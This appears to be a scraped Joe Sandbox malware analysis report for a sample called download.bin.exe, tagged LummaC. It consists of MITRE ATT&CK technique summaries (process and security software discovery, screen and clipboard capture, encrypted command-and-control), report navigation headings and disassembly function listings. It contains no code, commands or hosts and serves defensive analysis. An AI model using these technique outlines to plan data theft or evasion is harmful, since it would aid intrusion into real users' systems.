Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report download.bin.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
download.bin.exe

Function 05834B88 Relevance: 7.2, Strings: 5, Instructions: 983
COMMON

Function 05837128 Relevance: 3.8, Strings: 2, Instructions: 1343
COMMON

Function 05D6C640 Relevance: 3.1, Strings: 2, Instructions: 617
COMMON

Function 05C0012A Relevance: 2.9, Strings: 2, Instructions: 367
COMMON

Function 05C0B868 Relevance: 7.9, Strings: 6, Instructions: 403
COMMON

Function 05D66092 Relevance: 5.0, Strings: 4, Instructions: 40
COMMON

Function 05C0A5A8 Relevance: 4.2, Strings: 3, Instructions: 437
COMMON

Function 05C0C260 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Function 05C08688 Relevance: 3.9, Strings: 3, Instructions: 178
COMMON

Function 05D668AA Relevance: 3.8, Strings: 3, Instructions: 28
COMMON

Function 05C06AF9 Relevance: 3.0, Strings: 2, Instructions: 484
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre